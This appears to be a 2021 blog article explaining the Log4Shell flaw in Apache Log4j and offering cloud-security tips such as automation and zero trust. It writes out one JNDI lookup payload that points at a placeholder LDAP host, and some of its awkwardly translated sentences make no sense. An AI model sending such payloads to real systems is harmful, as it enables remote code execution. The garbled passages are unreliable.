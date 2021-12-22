



A vulnerability in Apache Log4j, now known as Log4Shell, has surprised security teams and swept the Internet.

A seemingly harmless logging tool has been used by hackers to control vulnerable applications. Apache has rated this vulnerability as “serious” and has released a patch to contain the potential damage. Log4Shell also has the highest CVSS score of 10. This means that this vulnerability is a serious flaw in the code used in the foundation of a huge number of web applications and is considered to be very widespread and dangerous.

This exploit works by relying on the benignness of the logs. Logs are typically not used as attack vectors. As a result, this attack has surprised so many security organizations. In this case, the Log4Shell vulnerability is included in the lookup plugin. The lookup plugin provides a way for Java apps to retrieve objects stored in DNS or LDAP directories. Plugins allow you to perform more proactive actions than “just” logging, which is key to the problem and allows attackers to exploit logging tools to hack your app.

The JNDI lookup plugin contains a Log4Shell vulnerability that normally requires the plugin input query to include only the object name. However, if the URL is inserted instead of the object name, for example $ {jndi: ldap: //website.com/rce} Log4j will connect to JNDI on the specified server and get the Java object. This allows remote code execution on the log server.

The ubiquitous nature of this logging tool means that hackers have endless opportunities to exploit.

Security for cloud applications has always been a challenge. Not only does the number of cloud applications continue to grow, but the applications themselves evolve and their usage changes over time. Still, we expect these applications to remain secure as they grow and that security teams can catch up with them.

There is a problem here. The DevOps team is innovating faster than ever, so it’s important to continue to protect your application as you continue to develop it. To protect against this and future attacks, organizations must maintain preemptiveness, coordinate cloud application security strategies, scale with cloud adoption, and prevent the next zero-day attack. There are several ways to achieve this.

Tip 1: Incorporate automation into your cloud security process. As a general rule, cloud tools can’t keep up with the developer team without automation. This includes cloud security tools. Without automation, they wouldn’t be able to stay ahead, anticipate the next attack, and find the malicious person. As the application evolves, it is important to ensure that new parts are protected as quickly as possible.

Tip 2: Eliminate human intervention as much as possible. Human monitoring is important for interpreting data and looking for macro trends, but it is not possible for human administrators to monitor and evaluate all microservices and code running within cloud applications. Human management is the responsibility of application security as the team scrambles to patch the security system, as shown in the Log4j exploit. The latest technology offers the opportunity to harness machine learning and artificial intelligence. This allows you to maintain security relevance as your application evolves faster than you ever imagined. It’s time to maximize this opportunity.

Tip 3: Take a zero trust approach to security. For zero-day attacks like the Log4j exploit, it’s important to take a zero-trust approach to prevent the attack, rather than having the team respond and fix it. Use security that provides precautions to eliminate the need to go back and patch potential vulnerabilities after a security team is discovered.

Tip 4: I don’t expect anything! When your DevOps team builds or improves your application, make sure that all Infrastructure-as-Code and other third-party code comply with your organization’s security policy and are protected in some way. Log4Shell is a good example of an innovative hacker.

The cloud has given organizations the opportunity to innovate and succeed, but it’s important to remember that malicious people are taking advantage of the same speed and scale of the cloud. The Log4j exploit proves this. It is true that organizations continuously monitor and issue warnings as needed, but this means remediation and is not as effective as prevention or preemptive measures. That’s why AI is an important component when trying to stay secure in today’s threat situations.

To stay ahead of criminals, organizations need to make sure they are leveraging hands-off automated zero trust security throughout the cloud environment and application lifecycle.

